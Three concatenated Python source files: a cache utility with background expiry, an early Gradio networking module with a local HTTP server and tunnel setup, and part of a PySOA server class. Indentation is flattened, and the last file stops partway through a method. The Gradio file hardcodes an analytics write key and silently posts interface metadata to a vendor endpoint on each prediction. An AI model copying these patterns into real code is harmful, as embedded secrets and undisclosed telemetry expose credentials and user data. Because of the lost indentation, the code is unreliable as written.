execution, and it makes sense to cache them.
2. The creation of said items is more computationally expensive than
accessing this cache.
3. The memory tradeoff is acceptable. (As with all caches, you are
trading CPU cost for memory cost).
    An example of this is UI code or string formatting code that refreshes the
display with (mostly) the same output over and over again. In that case it
may make more sense to just cache the output items (such as the formatted
amount results from format_satoshis), rather than regenerate them, as a
performance tweak.
ExpiringCache automatically has old items expire if `maxlen' is exceeded.
Items are timestamped with a 'tick count' (granularity of 10 seconds per
tick). Their timestamp is updated each time they are accessed via `get' (so
that only the oldest items that are least useful are the first to expire on
cache overflow).
get() and put() are fast. A background thread is used to safely
expire items when the cache overflows (so that get and put never stall
to manage the cache's size and/or to flush old items). This background
thread runs every 10 seconds -- so caches may temporarily overflow past
their maxlen for up to 10 seconds. '''
def __init__(self, *, maxlen=10000, name="An Unnamed Cache"):
assert maxlen > 0
self.maxlen = maxlen
self.name = name
self.d = dict()
_ExpiringCacheMgr.add_cache(self)
def get(self, key, default=None):
res = self.d.get(key)
if res is not None:
# cache hit
res[0] = _ExpiringCacheMgr.tick # update tick access time for this cache hit
return res[1]
# cache miss
return default
def put(self, key, value):
self.d[key] = [_ExpiringCacheMgr.tick, value]
def size_bytes(self):
''' Returns the cache's memory usage in bytes. This is done by doing a
deep, recursive examination of the cache contents. '''
return get_object_size(
self.d.copy() # prevent iterating over a mutating dict.
)
def __len__(self):
return len(self.d)
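# A minimal usage sketch (illustrative only; the helper below is not part of the
# original API, which is just get()/put()):
def _example_cached_call(cache, key, compute_fn):
    '''Memoize compute_fn(key) in an ExpiringCache: a hit refreshes the entry's
    access tick, a miss computes the value and stores it.'''
    value = cache.get(key)
    if value is None:
        value = compute_fn(key)
        cache.put(key, value)
    return value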
class _ExpiringCacheMgr(PrintError):
'''Do not use this class directly. Instead just create ExpiringCache
instances and that will handle the creation of this object automatically
and its lifecycle.
This is a singleton that manages the ExpiringCaches. It creates a thread
that wakes up every tick_interval seconds and expires old items from
overflowing extant caches.
Note that after the last cache is gc'd the manager thread will exit and
this singleton object also will expire and clean itself up automatically.'''
_lock = threading.Lock() # used to lock _instance and self.caches
_instance = None
tick = 0
tick_interval = 10.0 # seconds; we wake up this often to update 'tick' and also to expire old items for overflowing caches
def __init__(self, add_iter=None):
cls = type(self)
assert not cls._instance, "_ExpiringCacheMgr is a singleton"
super().__init__()
cls._instance = self
self.q = queue.Queue()
self.caches = weakref.WeakSet()
if add_iter:
self.caches.update(add_iter)
self.livect = len(self.caches) # this is updated by add_cache and on_cache_gc below.
self.thread = threading.Thread(target=self.mgr_thread, daemon=True)
self.thread.start()
@classmethod
def add_cache(cls, *caches):
assert caches
new_caches = caches
with cls._lock:
slf = cls._instance
if not slf:
slf = cls(caches)
assert slf == cls._instance
else:
new_caches = [c for c in caches if c not in slf.caches]
slf.caches.update(new_caches)
for cache in new_caches:
# add finalizer for each new cache
weakref.finalize(cache, cls.on_cache_gc, cache.name)
slf.livect = len(slf.caches)
@classmethod
def on_cache_gc(cls, name):
assert cls._instance
thread2join = None
with cls._lock:
slf = cls._instance
assert slf.thread.is_alive()
slf.livect -= 1 # we need to keep this counter because the weak set doesn't have the correct length at this point yet.
slf.print_error("Cache '{}' has been gc'd, {} still alive".format(name, slf.livect))
if not slf.livect: # all caches have been gc'd, kill the thread
slf.print_error("No more caches, stopping manager thread and removing singleton")
slf.q.put(None) # signal thread to stop
thread2join = slf.thread
cls._instance = None # kill self.
if thread2join:
# we do this here as defensive programming to avoid deadlocks in case
# thread ends up taking locks in some future implementation.
thread2join.join()
def mgr_thread(self):
cls = type(self)
#self.print_error("thread started")
try:
while True:
try:
x = self.q.get(timeout=self.tick_interval)
return # we got a stop signal
except queue.Empty:
# normal condition, we slept with nothing to do
pass
cls.tick += 1
for c in tuple(self.caches): # prevent cache from dying while we iterate
len_c = len(c.d) # capture length here as c.d may mutate and grow while this code executes.
if len_c > c.maxlen:
t0 = time.time()
num = cls._try_to_expire_old_items(c.d, len_c - c.maxlen)
tf = time.time()
self.print_error("{}: flushed {} items in {:.02f} msec".format(c.name, num,(tf-t0)*1e3))
finally:
self.print_error("thread exit")
@classmethod
def _try_to_expire_old_items(cls, d_orig, num):
d = d_orig.copy() # yes, this is slow but this makes it so we don't need locks.
assert len(d) > num and num > 0
# bin the cache.dict items by 'tick' (when they were last accessed)
bins = defaultdict(list)
for k,v in d.items():
tick = v[0]
bins[tick].append(k)
del d
# now, expire the old items starting with the oldest until we
# expire num items. note that during this loop it's possible
        # for items to get their timestamp updated by ExpiringCache.get().
# This loop will not detect that situation and will expire them anyway.
# This is fine, because it's a corner case and in the interests of
# keeping this code as simple as possible, we don't bother to guard
# against that.
ct = 0
sorted_bin_keys = sorted(bins.keys())
while ct < num and bins:
tick = sorted_bin_keys[0]
for key in bins[tick]:
del d_orig[key] # KeyError here should never happen. if it does we want the exception because it means a bug in this code
ct += 1
if ct >= num:
break
else:
del bins[tick]
del sorted_bin_keys[0]
return ct
def get_object_size(obj_0):
''' Debug tool -- returns the amount of memory taken by an object in bytes
by deeply examining its contents recursively (more accurate than
sys.getsizeof as a result). '''
import sys
from numbers import Number
    try:  # the ABCs moved to collections.abc (and are required there on Python 3.10+)
        from collections.abc import Set, Mapping
    except ImportError:  # Python 2 fallback
        from collections import Set, Mapping
    from collections import deque
try: # Python 2
zero_depth_bases = (basestring, Number, xrange, bytearray)
iteritems = 'iteritems'
except NameError: # Python 3
zero_depth_bases = (str, bytes, Number, range, bytearray)
iteritems = 'items'
def getsize(obj_0):
"""Recursively iterate to sum size of object & members."""
_seen_ids = set()
def inner(obj):
obj_id = id(obj)
if obj_id in _seen_ids:
return 0
_seen_ids.add(obj_id)
size = sys.getsizeof(obj)
if isinstance(obj, zero_depth_bases):
pass # bypass remaining control flow and return
elif isinstance(obj, (tuple, list, Set, deque)):
size += sum(inner(i) for i in obj)
elif isinstance(obj, Mapping) or hasattr(obj, iteritems):
size += sum(inner(k) + inner(v) for k, v in getattr(obj, iteritems)())
# Check for custom object instances - may subclass above too
if hasattr(obj, '__dict__'):
size += inner(vars(obj))
if hasattr(obj, '__slots__'): # can have __slots__ with __dict__
size += sum(inner(getattr(obj, s)) for s in obj.__slots__ if hasattr(obj, s))
return size
return inner(obj_0)
return getsize(obj_0)
|
networking.py
|
"""
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from http.server import HTTPServer as BaseHTTPServer, SimpleHTTPRequestHandler
import pkg_resources
from distutils import dir_util
from gradio import inputs, outputs
import json
from gradio.tunneling import create_tunnel
import urllib.request
from shutil import copyfile
import requests
import sys
import analytics
INITIAL_PORT_VALUE = int(os.getenv(
'GRADIO_SERVER_PORT', "7860")) # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = int(os.getenv(
'GRADIO_NUM_PORTS', "100")) # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv(
'GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "static/")
STATIC_PATH_TEMP = "static/"
TEMPLATE_TEMP = "index.html"
BASE_JS_FILE = "static/js/all_io.js"
CONFIG_FILE = "static/config.json"
ASSOCIATION_PATH_IN_STATIC = "static/apple-app-site-association"
ASSOCIATION_PATH_IN_ROOT = "apple-app-site-association"
FLAGGING_DIRECTORY = 'static/flagged/'
FLAGGING_FILENAME = 'data.txt'
analytics.write_key = "uxIFddIEuuUcFLf9VgH2teTEtPlWdkNy"
analytics_url = 'https://api.gradio.app/'
def build_template(temp_dir):
"""
Create HTML file with supporting JS and CSS files in a given directory.
:param temp_dir: string with path to temp directory in which the html file should be built
"""
dir_util.copy_tree(STATIC_TEMPLATE_LIB, temp_dir)
dir_util.copy_tree(STATIC_PATH_LIB, os.path.join(
temp_dir, STATIC_PATH_TEMP))
# Move association file to root of temporary directory.
copyfile(os.path.join(temp_dir, ASSOCIATION_PATH_IN_STATIC),
os.path.join(temp_dir, ASSOCIATION_PATH_IN_ROOT))
def render_template_with_tags(template_path, context):
"""
Combines the given template with a given context dictionary by replacing all of the occurrences of tags (enclosed
in double curly braces) with corresponding values.
:param template_path: a string with the path to the template file
:param context: a dictionary whose string keys are the tags to replace and whose string values are the replacements.
"""
print(template_path, context)
with open(template_path) as fin:
old_lines = fin.readlines()
new_lines = render_string_or_list_with_tags(old_lines, context)
with open(template_path, "w") as fout:
for line in new_lines:
fout.write(line)
def render_string_or_list_with_tags(old_lines, context):
# Handle string case
if isinstance(old_lines, str):
for key, value in context.items():
old_lines = old_lines.replace(r"{{" + key + r"}}", str(value))
return old_lines
# Handle list case
new_lines = []
for line in old_lines:
for key, value in context.items():
line = line.replace(r"{{" + key + r"}}", str(value))
new_lines.append(line)
return new_lines
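# Quick illustration of the tag replacement above (hypothetical values):
#   render_string_or_list_with_tags("port: {{port}}", {"port": 7860})
#     -> "port: 7860"
#   render_string_or_list_with_tags(["a {{x}}\n", "b {{x}}\n"], {"x": 1})
#     -> ["a 1\n", "b 1\n"]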
def set_config(config, temp_dir):
config_file = os.path.join(temp_dir, CONFIG_FILE)
with open(config_file, "w") as output:
json.dump(config, output)
def get_first_available_port(initial, final):
"""
Gets the first open port in a specified range of port numbers
:param initial: the initial value in the range of port numbers
:param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
:return:
"""
for port in range(initial, final):
try:
s = socket.socket() # create a socket object
s.bind((LOCALHOST_NAME, port)) # Bind to the port
s.close()
return port
except OSError:
pass
raise OSError(
"All ports from {} to {} are in use. Please close a port.".format(
initial, final
)
)
def send_prediction_analytics(interface):
data = {'title': interface.title,
'description': interface.description,
'thumbnail': interface.thumbnail,
'input_interface': interface.input_interfaces,
'output_interface': interface.output_interfaces,
}
print(data)
try:
requests.post(
analytics_url + 'gradio-prediction-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
def serve_files_in_background(interface, port, directory_to_serve=None, server_name=LOCALHOST_NAME):
class HTTPHandler(SimpleHTTPRequestHandler):
"""This handler uses server.base_path instead of always using os.getcwd()"""
def _set_headers(self):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
def translate_path(self, path):
path = SimpleHTTPRequestHandler.translate_path(self, path)
relpath = os.path.relpath(path, os.getcwd())
fullpath = os.path.join(self.server.base_path, relpath)
return fullpath
def log_message(self, format, *args):
return
def do_POST(self):
# Read body of the request.
if self.path == "/api/predict/":
# Make the prediction.
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
raw_input = msg["data"]
prediction, durations = interface.process(raw_input)
output = {"data": prediction, "durations": durations}
if interface.saliency is not None:
saliency = interface.saliency(raw_input, prediction)
output['saliency'] = saliency.tolist()
# if interface.always_flag:
# msg = json.loads(data_string)
# flag_dir = os.path.join(FLAGGING_DIRECTORY, str(interface.hash))
# os.makedirs(flag_dir, exist_ok=True)
# output_flag = {'input': interface.input_interface.rebuild_flagged(flag_dir, msg['data']),
# 'output': interface.output_interface.rebuild_flagged(flag_dir, processed_output),
# }
# with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
# f.write(json.dumps(output_flag))
# f.write("\n")
self.wfile.write(json.dumps(output).encode())
analytics_thread = threading.Thread(
target=send_prediction_analytics, args=[interface])
analytics_thread.start()
elif self.path == "/api/flag/":
self._set_headers()
data_string = self.rfile.read(
int(self.headers["Content-Length"]))
msg = json.loads(data_string)
flag_dir = os.path.join(FLAGGING_DIRECTORY,
str(interface.flag_hash))
os.makedirs(flag_dir, exist_ok=True)
output = {'inputs': [interface.input_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['input_data']) for i
in range(len(interface.input_interfaces))],
'outputs': [interface.output_interfaces[
i].rebuild_flagged(
flag_dir, msg['data']['output_data']) for i
in range(len(interface.output_interfaces))],
'message': msg['data']['message']}
with open(os.path.join(flag_dir, FLAGGING_FILENAME), 'a+') as f:
f.write(json.dumps(output))
f.write("\n")
else:
self.send_error(404, 'Path not found: {}'.format(self.path))
class HTTPServer(BaseHTTPServer):
"""The main server, you pass in base_path which is the path you want to serve requests from"""
def __init__(self, base_path, server_address, RequestHandlerClass=HTTPHandler):
self.base_path = base_path
BaseHTTPServer.__init__(self, server_address, RequestHandlerClass)
httpd = HTTPServer(directory_to_serve, (server_name, port))
# Now loop forever
def serve_forever():
try:
while True:
sys.stdout.flush()
httpd.serve_forever()
except (KeyboardInterrupt, OSError):
httpd.shutdown()
httpd.server_close()
thread = threading.Thread(target=serve_forever, daemon=False)
thread.start()
return httpd
def start_simple_server(interface, directory_to_serve=None, server_name=None, server_port=None):
if server_port is None:
server_port = INITIAL_PORT_VALUE
port = get_first_available_port(
server_port, server_port + TRY_NUM_PORTS
)
httpd = serve_files_in_background(interface, port, directory_to_serve, server_name)
return port, httpd
def close_server(server):
server.server_close()
def url_request(url):
try:
req = urllib.request.Request(
url=url, headers={"content-type": "application/json"}
)
res = urllib.request.urlopen(req, timeout=10)
return res
except Exception as e:
raise RuntimeError(str(e))
def setup_tunnel(local_server_port):
response = url_request(GRADIO_API_SERVER)
if response and response.code == 200:
try:
payload = json.loads(response.read().decode("utf-8"))[0]
return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
except Exception as e:
raise RuntimeError(str(e))
def url_ok(url):
try:
r = requests.head(url)
return r.status_code == 200
    except requests.ConnectionError:  # requests' ConnectionError, not the builtin
return False
|
server.py
|
from __future__ import (
absolute_import,
unicode_literals,
)
import argparse
import atexit
import codecs
import importlib
import logging
import logging.config
import os
import random
import signal
import sys
import threading
import time
import traceback
from types import FrameType
from typing import (
Any,
Callable,
Dict,
List,
Mapping,
Optional,
Type,
TypeVar,
cast,
)
import attr
from pymetrics.instruments import (
Timer,
TimerResolution,
)
from pymetrics.recorders.base import MetricsRecorder
import six
from pysoa.client.client import Client
from pysoa.common.constants import (
ERROR_CODE_ACTION_TIMEOUT,
ERROR_CODE_JOB_TIMEOUT,
ERROR_CODE_RESPONSE_NOT_SERIALIZABLE,
ERROR_CODE_RESPONSE_TOO_LARGE,
ERROR_CODE_SERVER_ERROR,
ERROR_CODE_UNKNOWN,
)
from pysoa.common.errors import Error
from pysoa.common.logging import (
PySOALogContextFilter,
RecursivelyCensoredDictWrapper,
)
from pysoa.common.serializer.errors import InvalidField
from pysoa.common.transport.base import ServerTransport
from pysoa.common.transport.errors import (
MessageReceiveTimeout,
MessageTooLarge,
TransientPySOATransportError,
)
from pysoa.common.types import (
ActionResponse,
Context,
JobResponse,
UnicodeKeysDict,
)
from pysoa.server import middleware
from pysoa.server.django.database import (
django_close_old_database_connections,
django_reset_database_queries,
)
from pysoa.server.errors import (
ActionError,
JobError,
)
from pysoa.server.internal.types import RequestSwitchSet
from pysoa.server.schemas import JobRequestSchema
from pysoa.server.settings import ServerSettings
from pysoa.server.types import (
ActionType,
EnrichedActionRequest,
EnrichedJobRequest,
IntrospectionActionType,
)
import pysoa.version
try:
from pysoa.server.internal.event_loop import AsyncEventLoopThread
except (ImportError, SyntaxError):
AsyncEventLoopThread = None # type: ignore
try:
from django.conf import settings as django_settings
from django.core.cache import caches as django_caches
except ImportError:
django_settings = None # type: ignore
django_caches = None # type: ignore
__all__ = (
'HarakiriInterrupt',
'Server',
'ServerMiddlewareActionTask',
'ServerMiddlewareJobTask',
)
# A hack to make documentation generation work properly, otherwise there are errors (see `if TYPE_CHECKING`)
middleware.EnrichedActionRequest = EnrichedActionRequest # type: ignore
middleware.EnrichedJobRequest = EnrichedJobRequest # type: ignore
ServerMiddlewareJobTask = Callable[[EnrichedJobRequest], JobResponse]
ServerMiddlewareActionTask = Callable[[EnrichedActionRequest], ActionResponse]
_MT = TypeVar('_MT', ServerMiddlewareActionTask, ServerMiddlewareJobTask)
_RT = TypeVar('_RT', JobResponse, ActionResponse)
def _replace_fid(d, fid): # type: (Dict[Any, Any], six.text_type) -> None
for k, v in six.iteritems(d):
if isinstance(v, six.text_type):
d[k] = v.replace('{{fid}}', fid).replace('[[fid]]', fid).replace('%%fid%%', fid)
elif isinstance(v, dict):
_replace_fid(v, fid)
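# Illustrative sketch of what _replace_fid does (shown as a comment, not executed):
#
#     config = {'path': '/tmp/metrics-{{fid}}.sock', 'nested': {'key': '[[fid]]'}}
#     _replace_fid(config, '3')
#     # config == {'path': '/tmp/metrics-3.sock', 'nested': {'key': '3'}}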
class HarakiriInterrupt(BaseException):
"""
Raised internally to notify the server code about interrupts due to harakiri. You should never, ever, ever, ever
catch this exception in your service code. As such, it inherits from `BaseException` so that even
`except Exception:` won't catch it. However, `except:` will catch it, so, per standard Python coding standards,
you should never use `except:` (or `except BaseException:`, for that matter).
"""
class Server(object):
"""
The base class from which all PySOA service servers inherit, and contains the code that does all of the heavy
lifting for receiving and handling requests, passing those requests off to the relevant actions, and sending
the actions' responses back to the caller.
Required attributes that all concrete subclasses must provide:
- `service_name`: A (unicode) string name of the service.
- `action_class_map`: An object supporting `__contains__` and `__getitem__` (typically a `dict`) whose keys are
action names and whose values are callable objects that return a callable action when called (such as subclasses
of `Action` which, when "called" [constructed], yield a callable object [instance of the subclass])
"""
settings_class = ServerSettings # type: Type[ServerSettings]
request_class = EnrichedActionRequest # type: Type[EnrichedActionRequest]
client_class = Client # type: Type[Client]
use_django = False # type: bool
service_name = None # type: Optional[six.text_type]
action_class_map = {} # type: Mapping[six.text_type, ActionType]
# Allow a server to specify a custom introspection action
introspection_action = None # type: Optional[IntrospectionActionType]
def __init__(self, settings, forked_process_id=None):
# type: (ServerSettings, Optional[int]) -> None
"""
:param settings: The settings object, which must be an instance of `ServerSettings` or one of its subclasses
:param forked_process_id: If multiple processes are forked by the same parent process, this will be set to a
unique, deterministic (incremental) ID which can be used in logging, the heartbeat
file, etc. For example, if the `--fork` argument is used with the value 5 (creating
five child processes), this argument will have the values 1, 2, 3, 4, and 5 across
the five respective child processes.
"""
# Check subclassing setup
if not self.service_name:
raise AttributeError('Server subclass must set service_name')
# Store settings and tweak if necessary based on the forked process ID
self.settings = settings
if self.settings['metrics'].get('kwargs', {}).get('config', {}).get('publishers', {}):
# Check if the metrics publisher config needs the FID anywhere and, if it does, replace it with the FID
fid = 'main' if forked_process_id is None else six.text_type(forked_process_id)
for publisher in self.settings['metrics']['kwargs']['config']['publishers']:
if self.settings['metrics']['kwargs']['config']['version'] == 1:
_replace_fid(publisher, fid)
elif publisher.get('kwargs', {}):
_replace_fid(publisher['kwargs'], fid)
# Create the metrics recorder and transport
self.metrics = self.settings['metrics']['object'](
**self.settings['metrics'].get('kwargs', {})
) # type: MetricsRecorder
self.transport = self.settings['transport']['object'](
self.service_name,
self.metrics,
forked_process_id or 1, # If no forking, there's only 1 instance
**self.settings['transport'].get('kwargs', {})
) # type: ServerTransport
self._async_event_loop_thread = None # type: Optional[AsyncEventLoopThread]
if AsyncEventLoopThread:
self._async_event_loop_thread = AsyncEventLoopThread([
m['object'](**m.get('kwargs', {}))
for m in self.settings['coroutine_middleware']
])
# Set initial state
self.shutting_down = False
self._shutdown_lock = threading.Lock()
self._last_signal = 0
self._last_signal_received = 0.0
# Instantiate middleware
self._middleware = [
m['object'](**m.get('kwargs', {}))
for m in self.settings['middleware']
] # type: List[middleware.ServerMiddleware]
self._middleware_job_wrapper = self.make_middleware_stack([m.job for m in self._middleware], self.execute_job)
# Set up logger
# noinspection PyTypeChecker
self.logger = logging.getLogger('pysoa.server')
# noinspection PyTypeChecker
self.job_logger = logging.getLogger('pysoa.server.job')
# Set these as the integer equivalents of the level names
self.request_log_success_level = logging.getLevelName(self.settings['request_log_success_level']) # type: int
self.request_log_error_level = logging.getLevelName(self.settings['request_log_error_level']) # type: int
class DictWrapper(RecursivelyCensoredDictWrapper):
SENSITIVE_FIELDS = frozenset(
RecursivelyCensoredDictWrapper.SENSITIVE_FIELDS | settings['extra_fields_to_redact'],
)
self.logging_dict_wrapper_class = DictWrapper # type: Type[RecursivelyCensoredDictWrapper]
self._default_status_action_class = None # type: Optional[ActionType]
self._idle_timer = None # type: Optional[Timer]
self._heartbeat_file = None # type: Optional[codecs.StreamReaderWriter]
self._heartbeat_file_path = None # type: Optional[six.text_type]
self._heartbeat_file_last_update = 0.0
self._forked_process_id = forked_process_id
self._skip_django_database_cleanup = False
def handle_next_request(self): # type: () -> None
"""
Retrieves the next request from the transport, or returns if it times out (no request has been made), and then
processes that request, sends its response, and returns when done.
"""
if not self._idle_timer:
# This method may be called multiple times before receiving a request, so we only create and start a timer
# if it's the first call or if the idle timer was stopped on the last call.
self._idle_timer = self.metrics.timer('server.idle_time', resolution=TimerResolution.MICROSECONDS)
self._idle_timer.start()
# Get the next JobRequest
try:
request_id, meta, job_request = self.transport.receive_request_message()
if request_id is None or meta is None or job_request is None:
self.logger.warning('Thought to be impossible, but the transport returned None')
raise MessageReceiveTimeout()
except MessageReceiveTimeout:
# no new message, nothing to do
self._idle_timer.stop()
self.perform_idle_actions()
self._set_busy_metrics(False)
self._idle_timer.start()
return
# We are no longer idle, so stop the timer, reset for the next idle period, and indicate busy in the gauges
self._idle_timer.stop()
self._idle_timer = None
self._set_busy_metrics(True)
self.metrics.publish_all()
try:
PySOALogContextFilter.set_logging_request_context(request_id=request_id, **job_request.get('context', {}))
except TypeError:
# Non-unicode keys in job_request['context'] will break keywording of a function call.
# Try to recover by coercing the keys to unicode.
PySOALogContextFilter.set_logging_request_context(
request_id=request_id,
**{six.text_type(k): v for k, v in six.iteritems(job_request['context'])}
)
request_for_logging = self.logging_dict_wrapper_class(job_request)
self.job_logger.log(self.request_log_success_level, 'Job request: %s', request_for_logging)
client_version = tuple(meta['client_version']) if 'client_version' in meta else (0, 40, 0)
def attr_filter(attrib, _value): # type: (attr.Attribute, Any) -> bool
# We don't want older clients to blow up trying to re-attr de-attr'd objects that have unexpected attrs
return (
not attrib.metadata or
'added_in_version' not in attrib.metadata or
client_version >= attrib.metadata['added_in_version']
)
try:
self.perform_pre_request_actions()
# Process and run the Job
job_response = self.process_job(job_request)
# Prepare the JobResponse for sending by converting it to a message dict
try:
response_message = attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter)
except Exception as e:
self.metrics.counter('server.error.response_conversion_failure').increment()
job_response = self.handle_unhandled_exception(e, JobResponse, variables={'job_response': job_response})
response_message = attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter)
response_for_logging = self.logging_dict_wrapper_class(response_message)
# Send the response message
try:
if not job_request.get('control', {}).get('suppress_response', False):
self.transport.send_response_message(request_id, meta, response_message)
except MessageTooLarge as e:
self.metrics.counter('server.error.response_too_large').increment()
job_response = self.handle_job_error_code(
ERROR_CODE_RESPONSE_TOO_LARGE,
'Could not send the response because it was too large',
request_for_logging,
response_for_logging,
extra={'serialized_length_in_bytes': e.message_size_in_bytes},
)
self.transport.send_response_message(
request_id,
meta,
attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter),
)
except InvalidField:
self.metrics.counter('server.error.response_not_serializable').increment()
job_response = self.handle_job_error_code(
ERROR_CODE_RESPONSE_NOT_SERIALIZABLE,
'Could not send the response because it failed to serialize',
request_for_logging,
response_for_logging,
)
self.transport.send_response_message(
request_id,
meta,
attr.asdict(job_response, dict_factory=UnicodeKeysDict, filter=attr_filter),
)
finally:
if job_response.errors or any(a.errors for a in job_response.actions):
if (
self.request_log_error_level > self.request_log_success_level and
self.job_logger.getEffectiveLevel() > self.request_log_success_level
):
# When we originally logged the request, it may have been hidden because the effective logging
# level threshold was greater than the level at which we logged the request. So re-log the
# request at the error level, if set higher.
self.job_logger.log(self.request_log_error_level, 'Job request: %s', request_for_logging)
self.job_logger.log(self.request_log_error_level, 'Job response: %s', response_for_logging)
else:
self.job_logger.log(self.request_log_success_level, 'Job response: %s', response_for_logging)
finally:
PySOALogContextFilter.clear_logging_request_context()
self.perform_post_request_actions()
self._set_busy_metrics(False)
def make_client(self, context, extra_context=None, **kwargs):
# type: (Context, Optional[Context], **Any) -> Client
"""
Gets a `Client` that will propagate the passed `context` in order to pass it down to middleware or Actions.
The server code will call this method only with the `context` argument and no other arguments. Subclasses can
override this method and replace its behavior completely or call `super` to pass `extra_context` data or
keyword arguments that will be passed to the client. The supplied `context` argument will not be modified in
any way (it will be copied); the same promise is not made for the `extra_context` argument.
:param context: The context parameter, supplied by the server code when making a client
:param extra_context: Extra context information supplied by subclasses as they see fit
:param kwargs: Keyword arguments that will be passed as-is to the `Client` constructor
:return: A `Client` configured with this server's `client_routing` settings and the supplied context, extra
context, and keyword arguments.
"""
context = context.copy()
if extra_context:
context.update(extra_context)
context['calling_service'] = self.service_name
return self.client_class(self.settings['client_routing'], context=context, **kwargs)
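# A hedged sketch of the override pattern described in the docstring above
# (the class name and context key are illustrative, not part of PySOA):
#
#     class MyServiceServer(Server):
#         def make_client(self, context, extra_context=None, **kwargs):
#             extra_context = dict(extra_context or {}, request_source='my_service')
#             return super(MyServiceServer, self).make_client(context, extra_context, **kwargs)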
# noinspection PyShadowingNames
@staticmethod
def make_middleware_stack(middleware, base): # type: (List[Callable[[_MT], _MT]], _MT) -> _MT
"""
Given a list of in-order middleware callable objects `middleware` and a base function `base`, chains them
together so each middleware is fed the function below, and returns the top level ready to call.
:param middleware: The middleware stack
:param base: The base callable that the lowest-order middleware wraps
:return: The topmost middleware, which calls the next middleware ... which calls the lowest-order middleware,
which calls the `base` callable.
"""
for ware in reversed(middleware):
base = ware(base)
return base
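# Sketch of the resulting call order: with middleware [m1, m2] (in settings
# order), the loop above builds m1(m2(base)), so a request flows
# m1 -> m2 -> base and the response unwinds base -> m2 -> m1. For example:
#
#     stack = Server.make_middleware_stack([m1.job, m2.job], server.execute_job)
#     job_response = stack(enriched_job_request)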
def process_job(self, job_request): # type: (Dict[six.text_type, Any]) -> JobResponse
"""
Validate, execute, and run the job request, wrapping it with any applicable job middleware.
:param job_request: The job request dict
:return: A `JobResponse` object
"""
try:
# Validate JobRequest message
validation_errors = [
Error(
code=error.code,
message=error.message,
field=error.pointer,
is_caller_error=False, # because this only happens if the client library code is buggy
)
for error in (JobRequestSchema.errors(job_request) or [])
]
if validation_errors:
raise JobError(errors=validation_errors, set_is_caller_error_to=None)
# Add the client object in case a middleware or action wishes to use it
job_request['client'] = self.make_client(job_request['context'])
# Add the run_coroutine in case a middleware or action wishes to use it
if self._async_event_loop_thread:
job_request['run_coroutine'] = self._async_event_loop_thread.run_coroutine
else:
job_request['run_coroutine'] = None
job_response = self._middleware_job_wrapper(EnrichedJobRequest(**job_request))
if 'correlation_id' in job_request['context']:
job_response.context['correlation_id'] = job_request['context']['correlation_id']
except HarakiriInterrupt:
self.metrics.counter('server.error.harakiri', harakiri_level='job').increment()
job_response = JobResponse(
errors=[Error(
code=ERROR_CODE_JOB_TIMEOUT,
message='The service job ran for too long and had to be interrupted (probably a middleware issue).',
is_caller_error=False,
)],
)
except JobError as e:
self.metrics.counter('server.error.job_error').increment()
job_response = JobResponse(errors=e.errors)
except Exception as e:
# Send a job error response if no middleware caught this.
self.metrics.counter('server.error.unhandled_error').increment()
return self.handle_unhandled_exception(e, JobResponse)
return job_response
def handle_unhandled_exception(self, exception, response_type, variables=None, **kwargs):
# type: (Exception, Type[_RT], Optional[Dict[six.text_type, Any]], **Any) -> _RT
"""
Makes and returns a last-ditch error response based on an unknown, unexpected error.
:param exception: The exception that happened.
:param response_type: The response type (:class:`JobResponse` or :class:`ActionResponse`) that should be
created.
:param variables: An optional dictionary of context-relevant variables to include in the error response.
:param kwargs: Keyword arguments that will be passed to the response object created.
:return: A `JobResponse` object or `ActionResponse` error based on the `response_type` argument.
"""
# noinspection PyBroadException
try:
# Get the error and traceback if we can
error_str, traceback_str = six.text_type(exception), traceback.format_exc()
except Exception:
self.metrics.counter('server.error.error_formatting_failure').increment()
error_str, traceback_str = 'Error formatting error', traceback.format_exc()
# Log what happened
self.logger.exception(exception)
if not isinstance(traceback_str, six.text_type):
try:
traceback_str = traceback_str.decode('utf-8')
except UnicodeDecodeError:
traceback_str = 'UnicodeDecodeError: Traceback could not be decoded'
error_dict = {
'code': ERROR_CODE_SERVER_ERROR,
'message': 'Internal server error: %s' % error_str,
'traceback': traceback_str,
'is_caller_error': False,
} # type: Dict[six.text_type, Any]
if variables is not None:
# noinspection PyBroadException
try:
error_dict['variables'] = {key: repr(value) for key, value in variables.items()}
except Exception:
self.metrics.counter('server.error.variable_formatting_failure').increment()
error_dict['variables'] = 'Error formatting variables'
return response_type(errors=[Error(**error_dict)], **kwargs)
def handle_job_error_code(
self,
code, # type: six.text_type
message, # type: six.text_type
request_for_logging, # type: RecursivelyCensoredDictWrapper
response_for_logging, # type: RecursivelyCensoredDictWrapper
extra=None, # type: Optional[Dict[six.text_type, Any]]
):
# type: (...) -> JobResponse
"""
Makes and returns a last-ditch error response based on a known, expected (though unwanted) error while
logging details about it.
:param code: The error code.
:param message: The error message.
:param request_for_logging: The censor-wrapped request dictionary.
:param response_for_logging: The censor-wrapped response dictionary.
:param extra: Any extra items to add to the logged error.
:return: A `JobResponse` object.
"""
log_extra = {'data': {'request': request_for_logging, 'response': response_for_logging}}
if extra:
log_extra['data'].update(extra)
self.logger.error(
message,
exc_info=True,
extra=log_extra,
)
return JobResponse(errors=[Error(code=code, message=message, is_caller_error=False)])
def execute_job(self, job_request): # type: (EnrichedJobRequest) -> JobResponse
"""
Processes and runs the action requests contained in the job and returns a `JobResponse`.
:param job_request: The job request
:return: A `JobResponse` object
"""
# Run the Job's Actions
harakiri = False
job_response = JobResponse()
job_switches = RequestSwitchSet(job_request.context['switches'])
for i, simple_action_request in enumerate(job_request.actions):
